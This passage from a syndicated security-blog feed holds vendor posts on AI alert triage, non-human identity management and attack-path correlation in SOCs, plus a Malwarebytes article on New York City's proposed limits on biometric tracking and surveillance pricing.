It cannot trace how a phishing payload transitions to credential theft, how compromised credentials enable lateral movement, or how each stage manifests differently across vendor telemetry. Cisco’s Foundation-sec-8b (an 8-billion parameter cybersecurity-specific model) outperforms general-purpose models nearly 10 times its size on security benchmarks. Domain-specific training data produces domain-specific accuracy.</p><p><strong>Static playbooks cannot adapt to context.</strong> Most AI-augmented SOAR platforms use LLMs to speed up authoring of the same rigid, pre-authored workflows. A phishing playbook runs the same 15–20 steps whether the target is an intern or the VP of Finance. Adding a natural language interface speeds creation. It does not fix the inability to adapt.</p><p><strong>No quality framework for AI triage decisions.</strong> In software engineering, code review, automated testing, and CI/CD pipelines catch slop before production. Vibe coding bypasses these gates. Most AI triage products have no equivalent. 
They classify alerts without exposing reasoning, without validating against ground truth, and without giving analysts a visible framework to assess correctness.</p><figure class="wp-block-image size-full"><img fetchpriority="high" decoding="async" width="960" height="540" src="https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1.png" alt="Cover art for the whitepaper titled: Morpheus AI-Driven Autonomous Investigation, Triage, and Response" class="wp-image-55641" srcset="https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1.png 960w, https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1-300x169.png 300w, https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1-768x432.png 768w" sizes="(max-width: 960px) 100vw, 960px"></figure><h2 class="wp-block-heading">How Morpheus AI Is Built to Prevent Triage Slop</h2><p>D3 Security built Morpheus AI with the explicit goal of producing triage decisions that withstand scrutiny.</p><ul class="wp-block-list"> <li><strong>Purpose-built cybersecurity LLM</strong>: 24 months, 60 specialists, trained on security telemetry and attack patterns. 
Built from the ground up for security, not a general-purpose model with a security prompt.</li> <li><strong><a href="https://d3security.com/morpheus/investigation/">Attack Path Discovery</a> on every alert</strong>: multi-dimensional correlation across the full security stack that exposes every node, connection, and reasoning step</li> <li><strong>Contextual Playbook Generation</strong>: bespoke response workflows generated at runtime from evidence, not static templates</li> <li><strong><a href="https://d3security.com/morpheus/self-healing-integrations/">Self-Healing Integrations</a></strong>: autonomous drift detection and remediation across 800+ tools</li> <li><strong>Deterministic/Indeterministic Trust Model</strong>: every AI decision goes through human validation before earning autonomous execution privileges</li> <li><strong>Visible code and reasoning chains</strong>: full access to back-end Python code for every AI-generated playbook</li> <li><strong>Attack simulation with known ground truth</strong>: realistic multi-stage attacks that validate whether the AI discovers complete attack paths</li> </ul><h2 class="wp-block-heading">The Question Every Security Leader Should Ask</h2><p>Does your AI triage platform show you the complete reasoning chain for every decision? Can analysts trace exactly how it reached each conclusion? Does it validate its accuracy against known ground truth?</p><p>If the answer to any of these is no, the system is producing triage slop by design. 
Confident-looking output from a system no one can verify.</p><p><strong>The lesson from vibe coding is definitive: the tool’s value depends entirely on the operator’s ability to evaluate what it produces.</strong></p><h2 class="wp-block-heading">See Morpheus AI in Action</h2><p><a href="https://d3security.com/demo/">Request a live demonstration</a> of <a href="https://d3security.com/morpheus/">Morpheus AI</a> to see how it prevents triage slop in your SOC environment.</p><figure class="wp-block-image aligncenter size-large size-full"><img decoding="async" width="1024" height="576" src="https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-%E2%80%94-SOC-Alert-Triage-Slop-1024x576.jpg" alt='Preview of the whitepaper: "SOC Alert Triage Slop: When AI-Generated Security Decisions Follow the Same Path as AI-Generated Code"' class="wp-image-59280" srcset="https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-SOC-Alert-Triage-Slop-1024x576.jpg 1024w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-SOC-Alert-Triage-Slop-300x169.jpg 300w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-SOC-Alert-Triage-Slop-768x432.jpg 768w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-SOC-Alert-Triage-Slop-1536x864.jpg 1536w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-SOC-Alert-Triage-Slop.jpg 1920w" sizes="(max-width: 1024px) 100vw, 1024px"></figure><p><strong>Read the Full Resource: </strong><a href="https://d3security.com/resources/soc-alert-triage-slop/"><strong>SOC Alert Triage Slop: When AI-Generated Security Decisions Follow the Same Path as AI-Generated Code</strong></a></p><p>A comprehensive analysis of how AI coding slop parallels AI triage slop, why the problem is architectural, and how purpose-built cybersecurity AI prevents it.</p><p>The post <a href="https://d3security.com/blog/amazon-lost-6-million-orders-vibe-coding-soc-next/">Amazon Lost 6.3 Million Orders to Vibe Coding. 
Your SOC Is Next.</a> appeared first on <a href="https://d3security.com/">D3 Security</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://d3security.com/">D3 Security</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Shriram Sharma">Shriram Sharma</a>. Read the original post at: <a href="https://d3security.com/blog/amazon-lost-6-million-orders-vibe-coding-soc-next/">https://d3security.com/blog/amazon-lost-6-million-orders-vibe-coding-soc-next/</a> </p>

Are you certain your Agentic AI optimally performs

  • Published date: 2026-03-20 00:00:00


<h2>How Can Non-Human Identities Enhance Agentic AI Performance?</h2><p>What strategies are you employing to manage non-human identities (NHIs) within your organization? The notion of NHIs encompasses more than just machine identities; it’s about the seamless coordination between cybersecurity and R&amp;D to secure the cloud environment.</p><h3>Understanding Non-Human Identities in Cybersecurity</h3><p>Non-human identities, or NHIs, act as digital passports, streamlining interactions within complex systems. This dual role combines a “Secret” and the corresponding permissions granted by a server, akin to a tourist navigating international borders with a passport and a visa. However, much like human travelers, these digital “tourists” require meticulous oversight to prevent unauthorized access and ensure optimal performance.</p><p>NHIs are vital across various sectors, including financial services, healthcare, travel, DevOps, and Security Operations Center (SOC) teams, particularly those utilizing cloud infrastructure. Managing these identities involves securing both the “tourists” and their “passports,” with a focus on monitoring behaviors and safeguarding access credentials.</p><h3>The Lifecycle of NHI Management</h3><p>Managing NHIs throughout their lifecycle is crucial for maintaining a secure and efficient system. 
This comprehensive approach includes:</p><ul> <li><strong>Discovery and Classification:</strong> Identifying all existing NHIs and categorizing them based on their functions and levels of access.</li> <li><strong>Threat Detection and Remediation:</strong> Continuously monitoring for suspicious activities and taking corrective actions promptly.</li> <li><strong>Ownership and Permissions Management:</strong> Establishing clear ownership and managing permissions to avert unauthorized access.</li> <li><strong>Usage Pattern Analysis:</strong> Gleaning insights from usage trends to identify potential vulnerabilities.</li> <li><strong>Decommissioning:</strong> Systematic retirement of NHIs no longer in use to mitigate security risks</li> </ul><p>By addressing these phases, organizations achieve context-aware security, moving beyond point solutions like secret scanners that offer limited protection.</p><h3>Benefits of Comprehensive NHI Management</h3><p>Effective NHI management delivers several strategic benefits, contributing to a secure and efficient operational framework:</p><ul> <li><strong>Reduced Risk:</strong> Proactively identifying and mitigating security risks reduces the likelihood of breaches and data leaks.</li> <li><strong>Improved Compliance:</strong> Ensures organizations meet regulatory requirements through stringent policy enforcement and comprehensive audit trails.</li> <li><strong>Increased Efficiency:</strong> Automating NHI and secrets management allows security teams to focus on strategic initiatives instead of repetitive tasks.</li> <li><strong>Enhanced Visibility and Control:</strong> Offers a centralized view of access management and governance, enhancing oversight and decision-making.</li> <li><strong>Cost Savings:</strong> Through automation of secrets rotation and decommissioning, organizations can reduce operational costs substantially.</li> </ul><h3>Realizing Optimal Performance with Agentic AI</h3><p>The role of NHIs extends to enhancing the 
performance of Agentic AI systems. In finance, for example, NHIs help streamline the processing of financial forecasts, as illustrated in various forecasting methodologies. By securing the data flow and access, AI systems can operate without interruptions, ensuring accuracy and reliability.</p><p>Moreover, NHIs are instrumental in evaluating machine learning models, enhancing the training process and outcome. This facilitates the development of robust AI algorithms that can adapt to evolving data patterns swiftly.</p><h3>Strategic Integration and Future Insights</h3><p>For cloud-centric organizations, integrating NHI management with cloud environments is vital. This integration fosters seamless interactions between development and security teams, bridging existing gaps and ensuring a secure and agile operational setup.</p><p>An excellent example can be seen in how Elastic scaled its secrets and NHI security effectively, moving from visibility to automation, which you can explore further in <a href="https://entro.security/blog/how-elastic-scaled-secrets-nhi-security-elastics-playbook-from-visibility-to-automation/">this playbook</a>. It showcases how proper management of NHIs enabled more efficient and secure cloud operations.</p><p>Focusing on NHIs offers organizations not just a tactical advantage, but a strategic necessity to ensure optimal performance and security. As industries advance, the effective management of NHIs will be a cornerstone of robust cybersecurity frameworks. This requires continuous learning and adaptation, ensuring that systems are not just secure but also agile enough to anticipate future challenges.</p><h3>Enhancing NHIs for Robust Cloud Security</h3><p>Are you considering how NHIs can elevate your organization’s cloud security strategy? When it comes to cloud-based operations, the management of NHIs is critical for robust security. 
The creation of a secure cloud environment involves seamless collaboration between cybersecurity and R&amp;D teams to manage these identities effectively.</p><p>For organizations leveraging cloud resources, the management of NHIs involves a systematic and structured approach. This not only safeguards against potential breaches but also ensures that the integrity of the cloud environment is maintained. Intrinsically, NHIs help organizations build a security posture that is both responsive and resilient.</p><h3>The Role of AI and Automation in NHI Management</h3><p>As AI and automation become integral to cybersecurity, NHIs play a pivotal role in supporting these technologies. With the ability to manage identities automatically, organizations can significantly enhance their security framework.</p><ul> <li><strong>AI-Driven Threat Intelligence:</strong> Leveraging AI for threat intelligence helps in identifying anomalies more swiftly, ensuring the protection of sensitive data.</li> <li><strong>Automated Compliance Monitoring:</strong> Compliance checks can be automated to ensure adherence to industry regulations without manual intervention.</li> <li><strong>Adaptive Learning Models:</strong> NHIs facilitate machine learning models that adapt to evolving threats, making systems more resilient over time.</li> <li><strong>Seamless Integration:</strong> Automating NHI management ensures seamless integrations across platforms, enhancing operational efficiency.</li> </ul><p>An example of leveraging NHIs in AI is detailed in organizations to incorporate AI into their security operations. It highlights how NHIs enhance AI’s capability to process and analyze large data volumes effectively, strengthening the overall security fabric.</p><h3>Market Trends and Industry Applications</h3><p>The significance of NHIs is increasingly recognized across various industry sectors. 
In healthcare, for instance, NHIs ensure the secure handling of patient data and compliance with regulations like HIPAA. In DevOps, they facilitate continuous integration and deployment, highlighting the need for agile security measures. By effectively managing these identities, organizations can better protect their data, ensure compliance, and boost operational efficiency.</p><p>Additionally, financial institutions are adopting NHI strategies to secure payment processes and protect sensitive financial data. For example, during transactions, NHIs ensure that only authorized entities can access the system, mitigating the risk of fraud.</p><p>Utilizing NHIs efficiently is also demonstrated in strategic partnerships within various industries. A compelling example of optimal performance through NHIs which discusses the impact of secure identity management on AI performance.</p><h3>Strategizing Future Adoption of NHIs</h3><p>How can organizations remain ahead with NHIs? Moving forward, it is imperative for organizations to focus on developing robust NHI management strategies to maintain their security posture.</p><p>Key strategies include:</p><p><strong>Strategic Cross-Department Collaboration</strong>: Ensuring seamless communication and strategies between cybersecurity, R&amp;D, and operational teams to manage NHIs efficiently.</p><p><strong>Focus on Identity Lifecycle Management</strong>: Developing policies that cover the entire identity lifecycle, from creation to decommissioning, ensuring all facets are secure.</p><p><strong>Continuous Education and Training</strong>: Implementing ongoing training programs for security teams to better understand advancements in NHI technology and management practices.</p><p>As emphasized by industry experts, the adoption of NHIs as a strategic asset is critical for organizations to thrive securely. 
The integration of <a href="https://entro.security/blog/entro-custom-secrets-self-serve-detection-rules-across-code-cloud-and-agents/">custom secrets self-serve detection rules</a> across systems offers a glimpse into how seamless identity management can operate within intricate cloud configurations.</p><p>Incorporating these proactive measures into an organization’s security strategy ensures not only a responsive defense mechanism but also establishes a forward-thinking approach to cybersecurity challenges. NHIs are more than just security tokens; they are agents of transformation that can enhance the efficiency and resilience of business operations across industries.</p><p>The strategic management of NHIs provides a pathway to not merely withstand the dynamic challenges of cybersecurity but to harness them into opportunities for enhanced business coherence and trust. For additional insights on how organizations have effectively kept <a href="https://entro.security/blog/keeping-security-in-stride-why-we-built-entros-third-pillar-for-agentic-ai/" rel="noopener">security in stride with Agentic AI</a>, this resource illustrates successful integration strategies.</p><p>While we scale new heights in technology, embracing Non-Human Identities with a strategic, informed, and sophisticated approach will shape the future of secure, agile, and reliable digital enterprises.</p><p>The post <a href="https://entro.security/are-you-certain-your-agentic-ai-optimally-performs/">Are you certain your Agentic AI optimally performs</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alison Mack">Alison Mack</a>. Read the original post at: <a href="https://entro.security/are-you-certain-your-agentic-ai-optimally-performs/">https://entro.security/are-you-certain-your-agentic-ai-optimally-performs/</a> </p>

Could your face change what you pay? NYC wants limits on biometric tracking

  • Published date: 2026-03-20 00:00:00


<p>New York City lawmakers are pushing to ban private businesses from using biometric tools like voice and facial recognition software to track the public.</p><p>While the desire to use surveillance technology in stores to fight shoplifting is understandable, <a href="https://www.nyclu.org/commentary/new-york-grocery-stores-are-scanning-your-face-lawmakers-can-stop-it" rel="noreferrer noopener nofollow">lawmakers</a> and <a href="https://www.politico.com/newsletters/digital-future-daily/2026/03/16/the-facial-recognition-grocery-fight-00830499" rel="noreferrer noopener nofollow">privacy advocates</a> are worried that the data could be repurposed to profile customers.</p><p>The New York City Council has held a <a href="https://legistar.council.nyc.gov/MeetingDetail.aspx?ID=1390774&amp;GUID=79F32E76-264B-40AD-81A8-81CE9AF71294&amp;Options=info%7C&amp;Search=" rel="noreferrer noopener nofollow">hearing</a> over two bills that would ban city landlords and businesses from using facial recognition technology.</p><ul class="wp-block-list"> <li>One proposal would make it illegal for any public place to use biometric recognition technology to identify or verify a customer.</li> <li>The other would prohibit landlords from installing, activating, or using any biometric recognition technology that identifies tenants or their guests.</li> </ul><p>In this article we want to focus on some of the reasons behind these proposals.</p><p>For context, it’s good to know that in New York City, businesses that collect biometric data are already <a href="https://www.nyclu.org/resources/policy/testimonies/testimony-implementation-local-law-3-2021" rel="noreferrer noopener nofollow">required</a> to post standardized signs letting people know.</p><p>Let’s look at what happens when your face becomes your ID, and every movement in a store can be turned into another data point.</p><h2 class="wp-block-heading" id="h-why-gathering-biometric-data-is-considered-bad">Why gathering biometric data is 
considered bad</h2><p>Collecting biometric data raises several objections. The most pressing ones are:</p><ul class="wp-block-list"> <li><strong>Unique but hard-to-erase identifiers. </strong>While you can reset a password, your face is harder to change. This means data leaks or abuse of facial templates, gait, or voiceprints can create permanent risks and be linked across databases.</li> <li><strong>Accuracy and bias concerns. </strong><a href="https://www.aclu-mn.org/news/biased-technology-automated-discrimination-facial-recognition/" rel="noreferrer noopener nofollow">Studies</a> and civil liberties groups have found that facial recognition systems can be <a href="https://www.scientificamerican.com/article/police-facial-recognition-technology-cant-tell-black-people-apart/" rel="noreferrer noopener nofollow">error-prone and biased</a> across different groups.</li> <li><strong>Lack of meaningful consent. </strong>In practice, supermarkets and landlords using facial recognition are giving people a mere theoretical choice. People can submit their biometrics or forego basic services. Critics argue that this undermines genuine consent.</li> <li><strong>Chilling effect. </strong>The feeling of constantly being watched everywhere you go is an uncomfortable one, and can discourage people from engaging in everyday, legitimate activities.</li> <li><strong>Surveillance pricing. </strong>This deserves some more explanation, which we’ll cover next.</li> </ul><h2 class="wp-block-heading" id="h-what-is-surveillance-pricing">What is surveillance pricing?</h2><p>It’s essentially how your face becomes an unerasable loyalty card.</p><p>Imagine you go into a local supermarket and notice that different people pay different prices for the same item. 
Would that feel fair?</p><p>Surveillance pricing refers to the use of detailed consumer data and behavioral signals to dynamically adjust prices.</p><p>Some characterize it as retailers using big‑data profiles to segment customers into increasingly narrow groups, down to the level of potentially charging each person the maximum the model thinks they are willing to pay.</p><p>We already see versions of this online. When you’re <a href="https://www.theguardian.com/lifeandstyle/2025/may/21/booking-flights-online-dynamic-pricing-ticket-is-it-legal-australia" rel="noreferrer noopener nofollow">looking for airline tickets</a>, for example, prices can change based on various signals. But it can be hard to notice, and companies <a href="https://news.delta.com/delta-responds-misinformation-around-ai-pricing" rel="noreferrer noopener nofollow">tell us it’s not personal</a>. But imagine that same logic quietly following you into the supermarket.</p><p>How this works online is relatively straightforward: websites track clicks, time on page, cart activity, and past spending to estimate how sensitive you are to price changes. </p><p>In physical stores it’s more complex, but not impossible. Data from in-store security systems that also collect biometrics and facial recognition, combined with loyalty programs, apps, and in‑store Wi‑Fi analytics, could, in theory, be used to build similar profiles. </p><p>Electronic shelf labels (ESL) can already allow retailers to change shelf prices instantly across a store or specific sections.</p><p>This could lead to situations where wealthier or more brand-loyal customers are quietly charged more. Or vulnerable groups could be targeted with manipulative discounts for higher‑margin or even less healthy products.</p><h2 class="wp-block-heading" id="h-what-to-do">What to do?</h2><p>Unfortunately, there’s no simple way to privacy‑hack your way out of a system that can turn your body into a tracking ID. 
The most effective fix is boring but powerful: laws with teeth, regulators that actually enforce them, and stores that don’t hide what they’re doing.</p><p>You could:</p><ul class="wp-block-list"> <li>Avoid stores that openly advertise biometric scanning when there are alternatives.</li> <li> Support local and national efforts to regulate biometric tracking and related practices, such as the proposals from the New York City Council.</li> </ul><p>We shouldn’t have to trade access to food, housing, or basic services for the ability to move through a city without our bodies being mined for data. If we don’t draw that line now, practices like surveillance pricing could quietly bake inequality and discrimination into something as mundane as buying groceries.</p><hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"><p><strong>We don’t just report on privacy—we offer you the option to use it.</strong></p><p>Privacy risks should never spread beyond a headline. Keep your online privacy yours by using <a href="https://www.malwarebytes.com/vpn">Malwarebytes Privacy VPN</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.malwarebytes.com/">Malwarebytes</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Malwarebytes">Malwarebytes</a>. Read the original post at: <a href="https://www.malwarebytes.com/blog/news/2026/03/could-your-face-change-what-you-pay-nyc-wants-limits-on-biometric-tracking">https://www.malwarebytes.com/blog/news/2026/03/could-your-face-change-what-you-pay-nyc-wants-limits-on-biometric-tracking</a> </p>

Randall Munroe’s XKCD ‘Plums’

  • Published date: 2026-03-20 00:00:00

<figure class=" sqs-block-image-figure intrinsic "> <p> <a class=" sqs-block-image-link " href="https://xkcd.com/3209/"></a></p> <p> <img alt="" src="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/0cb29db4-14a2-445e-9457-1e4cc4398d4a/plums.png?format=1000w" width="251" height="409"></p> <p> <figcaption class="image-caption-wrapper"> <p class=""><strong>via the comic artistry and dry wit of Randall Munroe, creator of XKCD</strong></p> </figcaption></p></figure><p><a href="https://www.infosecurity.us/blog/2026/3/20/randall-munroes-xkcd-plums">Permalink</a></p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.infosecurity.us/">Infosecurity.US</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Marc Handelman">Marc Handelman</a>. Read the original post at: <a href="https://xkcd.com/3209/">https://xkcd.com/3209/</a> </p>

Your Lateral Movement Detection Tools Are Missing 90% of Attacks. Here’s Why.

  • Published date: 2026-03-20 00:00:00

<p>The average time to detect a breach used to be measured in months. Now it’s measured in minutes. And your <a href="https://d3security.com/glossary/">lateral movement detection tools</a> still can’t keep up.</p><p>Here’s the uncomfortable truth: <strong>90% of organizations experienced lateral movement in their last breach</strong>, and most detected it too late. The average eCrime attacker achieves a complete breakout in just 29 minutes, according to <a href="https://www.crowdstrike.com/global-threat-report/" rel="noreferrer noopener">CrowdStrike’s 2026 Global Threat Report</a>. Your detection tools are fighting a 70-minute alert investigation timeline with a 56-minute delay before a SOC analyst even <em>begins</em> to act. By then, the attacker is already pivoting.</p><p>The problem is structural.</p><h2 class="wp-block-heading">The Blind Spot in Lateral Movement Detection Tools</h2><h3 class="wp-block-heading">Structural Gaps in Detection Coverage</h3><p>Traditional lateral movement detection tools work in silos. They monitor individual signals (network traffic, endpoint behavior, credentials used, privileged access) but they don’t <em>see</em> the story connecting them. They’re like security cameras in different rooms of a building that never share footage.</p><p>An attacker exploits this structural gap daily. They move from the compromised finance analyst to a mid-tier file server. Your EDR flags the movement. Your SIEM flags the unusual login. Your NDR flags the unusual data transfer. But none of these tools talk to each other in real time. So you get three independent alerts, three separate investigations, three chances to miss the full scope of the compromise.</p><p>This is why 67% of alerts go uninvestigated. Not because analysts are asleep. Because they can’t correlate disparate signals fast enough to understand what they’re looking at.</p><h3 class="wp-block-heading">Speed Limitations in Alert Investigation</h3><p>The second problem: stealth. 
Modern attacks don’t announce themselves. CrowdStrike’s 2026 data shows <strong>82% of current detections are malware-free attacks</strong>: pure human-operated lateral movement using legitimate tools and stolen credentials. Your lateral movement detection tools are trained to spot malicious code, unusual process chains, and behavioral anomalies. But when an attacker uses your own admin credentials to move laterally, when they use RDP or PowerShell as you do every day, when they leverage legitimate tools, the signal disappears into the noise.</p><p>Traditional lateral movement detection tools catch the obvious move. They miss the smart attacker.</p><p>The third problem is scope. When lateral movement detection tools finally flag something suspicious, they show you an alert. Not a map. Not a timeline. Not what the attacker <em>accessed</em>. You get a data point, and from that point, your SOC team must manually follow the thread backward and forward to understand what happened. That’s why the average investigation takes 70 minutes, and that’s <em>if</em> the alert survives the investigation prioritization queue.</p><div style="display: flex; justify-content: center; align-items: center; width: 100%; min-height: auto;"> <object type="image/svg+xml" data="https://d3security.com/wp-content/uploads/2026/03/MorpheusAPD-3.svg" width="100%" height="auto" style="max-width: 800px;"></object> </div><h2 class="wp-block-heading">How Attack Path Discovery Changes the Equation</h2><p><a href="https://d3security.com/morpheus/investigation/">Attack Path Discovery</a> (APD) represents a fundamental shift in how you understand compromise.</p><p>Instead of detecting individual lateral moves, APD correlates evidence across your <em>entire security stack</em> (endpoint, network, identity, cloud, data, applications) simultaneously. It doesn’t wait for a single tool to flag something suspicious. 
It maps the full logical journey an attacker took, showing you exactly which systems were accessed, which credentials were used, what data was touched, and which systems are now at risk.</p><p>This matters because lateral movement is a sequence of connected events. Traditional tools see the tree. APD sees the forest.</p><p>When an attacker moves from the compromised endpoint to a file server to a database, traditional lateral movement detection tools produce three separate alerts (or none, if the attacker was subtle). APD produces one clear narrative: the attack path. It shows the entry point, every hop, every privilege escalation, every sensitive data access. A complete picture of the compromise in one coherent story.</p><p>This changes how fast your SOC can respond. It changes what they can actually prevent.</p><p> </p><h2 class="wp-block-heading">How Morpheus AI Implements Attack Path Discovery</h2><p><a href="https://d3security.com/morpheus/">Morpheus AI</a> is purpose-built for this. It’s a cybersecurity-specific large language model trained for 24 months by 60 security specialists to understand attack paths as sequences, not isolated events. Rather than a lateral movement detection tool layered on top of a general-purpose platform, it represents a fundamental shift in attack understanding.</p><p>Here’s what that means in practice:</p><h3 class="wp-block-heading">Multi-Dimensional Correlation</h3><p>Morpheus AI ingests data from 800+ security integrations, every tool in your stack. More importantly, it understands the <em>relationships</em> between those data sources. It knows that an unusual network connection + a new credential use + a data access event = a potential lateral movement sequence, even if each individual signal is subtle.</p><h3 class="wp-block-heading">Self-Healing Integrations and Contextual Playbooks</h3><p><strong><a href="https://d3security.com/morpheus/self-healing-integrations/">Self-Healing Integrations</a>.</strong> APIs drift. 
Integrations break. When they do, most platforms stop collecting data. Morpheus AI’s self-healing integration layer detects API drift automatically and fixes it, so you don’t lose visibility during an attack because a Splunk connector drifted.</p><p><strong>Contextual Playbook Generation.</strong> You don’t have to choose between speed and accuracy. Morpheus AI generates response playbooks <em>at runtime</em>, based on the actual evidence it found. These are playbooks tailored to the specific attack path it discovered, not templated responses or generic runbooks. This means your SOC can start responding to the actual compromise, not a hypothetical one. This kind of <a href="https://d3security.com/morpheus/response/">security automation</a> is what separates reactive from proactive security operations.</p><h3 class="wp-block-heading">Sub-2-Minute Investigation</h3><p>While traditional lateral movement detection tools leave SOC analysts staring at an alert for 70 minutes trying to understand context, Morpheus AI delivers a complete attack path narrative in under 2 minutes. It answers the questions your team would spend an hour manually investigating: What was the entry point? Where did they move? What can they access now? What’s the blast radius?</p><h2 class="wp-block-heading">A Real-World Scenario: Why Lateral Movement Detection Tools Fail</h2><p>Consider a scenario from real SOC experience:</p><p>A finance analyst clicks a phishing link. Their endpoint is compromised. They don’t know it yet.</p><p><strong>Hour 0:00</strong> — The attacker lands on the compromised endpoint. Traditional lateral movement detection tools might flag unusual process activity, but the endpoint wasn’t running active threat hunting. The alert sits in a queue.</p><p><strong>Hour 0:15</strong> — The attacker extracts the analyst’s cached credentials and uses them to RDP into a mid-tier file server. 
Traditional lateral movement detection tools might flag the RDP connection (unusual for this user, unusual time of day) but the organization has thousands of RDP connections daily. The alert is low-confidence. It goes to the bottom of the triage queue.</p><p><strong>Hour 0:22</strong> — The attacker moves from the file server to a database server. They extract a list of customer accounts. Traditional lateral movement detection tools flag a data exfiltration event. But the database connection came from a known internal server, using cached credentials. Low-confidence. Queue.</p><p><strong>Hour 1:05</strong> — A security analyst finally begins investigating one of these alerts. They spend 70 minutes correlating events from endpoint, network, and database logs to understand the full scope: entry point, lateral movement path, data accessed.</p><p><strong>Hour 2:15</strong> — Response begins.</p><p>With Morpheus AI’s <a href="https://d3security.com/morpheus/investigation/">Attack Path Discovery</a>:</p><p><strong>Hour 0:22</strong> — Morpheus AI correlates the endpoint compromise, the credential extraction, the unusual RDP connection, the suspicious database access, and the data exfiltration into a single coherent narrative. It generates a playbook: isolate the compromised endpoint, revoke cached credentials, audit database access, lock down the affected servers.</p><p><strong>Hour 0:25</strong> — The SOC analyst sees a complete attack path, not three separate alerts. Response begins immediately. The attacker has been active for 22 minutes. Your organization stops them at minute 25.</p><p>The difference between lateral movement detection tools and Attack Path Discovery is fundamental. It’s the difference between seeing the attack and understanding it. 
Between spending 70 minutes investigating and 2 minutes responding.</p><h2 class="wp-block-heading">Why This Matters for Your Bottom Line</h2><p>The average breach involving lateral movement costs <strong>$4.88 million</strong>. A third of that cost comes from investigation and response time. Cutting investigation time by an order of magnitude (from 70 minutes to 2 minutes) is transformational.</p><p>More importantly, it’s about what you can actually prevent. When your SOC team can see a complete attack path in 2 minutes instead of an hour, they can intervene during the attack. They can block the next lateral move. They can isolate systems before data is exfiltrated. They stop the attacker mid-sequence, not after full compromise.</p><p>Traditional lateral movement detection tools react to what already happened. Attack Path Discovery prevents what’s about to happen.</p><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="960" height="540" src="https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1.png" alt="Cover art for the whitepaper titled: Morpheus AI-Driven Autonomous Investigation, Triage, and Response" class="wp-image-55641" srcset="https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1.png 960w, https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1-300x169.png 300w, https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1-768x432.png 768w" sizes="auto, (max-width: 960px) 100vw, 960px"></figure><h2 class="wp-block-heading">The Verdict: Why Lateral Movement Detection Tools Aren’t Enough</h2><p>Your lateral movement detection tools are working as designed. They’re catching individual lateral moves. But in an environment where the average attacker completes a full breakout in 29 minutes, individual detection isn’t enough. You need correlation. You need speed. 
You need the full attack path, not isolated alerts.</p><p>That’s what separates Attack Path Discovery from lateral movement detection tools. It’s a fundamentally different model: one built on autonomous multi-dimensional correlation across your entire security stack, delivered in the time it takes to pour a cup of coffee.</p><p>Morpheus AI brings this model to your organization without requiring you to rip out your existing tools. It integrates with 800+ platforms. It learns your specific environment. It generates playbooks that your team can execute immediately.</p><p>Lateral movement detection tools have a place in your security program. What matters is whether you can afford to rely on them alone. You need correlation, speed, and the full attack path.</p><h2 class="wp-block-heading">See Attack Path Discovery in Action</h2><p><a href="https://d3security.com/demo/">Request a live demonstration</a> of <a href="https://d3security.com/morpheus/">Morpheus AI</a> tracing a complete attack path across your security stack in under 2 minutes.</p><figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="1920" height="1080" src="https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-%E2%80%94-Attack-Path-Discovery-vs.-Lateral-Movement-Detection.jpg" alt="" class="wp-image-59260" srcset="https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Attack-Path-Discovery-vs.-Lateral-Movement-Detection.jpg 1920w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Attack-Path-Discovery-vs.-Lateral-Movement-Detection-300x169.jpg 300w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Attack-Path-Discovery-vs.-Lateral-Movement-Detection-1024x576.jpg 1024w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Attack-Path-Discovery-vs.-Lateral-Movement-Detection-768x432.jpg 768w, 
https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Attack-Path-Discovery-vs.-Lateral-Movement-Detection-1536x864.jpg 1536w" sizes="auto, (max-width: 1920px) 100vw, 1920px"></figure><p><strong>Read the Full Resource: </strong><a href="https://d3security.com/resources/attack-path-discovery-vs-lateral-movement/"><strong>Attack Path Discovery vs. Lateral Movement Detection: Why Detection Alone Falls Short</strong></a></p><p>A detailed comparison of lateral movement detection tools vs. Attack Path Discovery, with real-world scenarios and timing analysis.</p><p><em>Explore more cybersecurity terms and concepts in the <a href="https://d3security.com/glossary/">D3 Security Glossary</a>.</em></p><p>The post <a href="https://d3security.com/blog/attack-path-discovery-vs-lateral-movement/">Your Lateral Movement Detection Tools Are Missing 90% of Attacks. Here’s Why.</a> appeared first on <a href="https://d3security.com/">D3 Security</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://d3security.com/">D3 Security</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Shriram Sharma">Shriram Sharma</a>. Read the original post at: <a 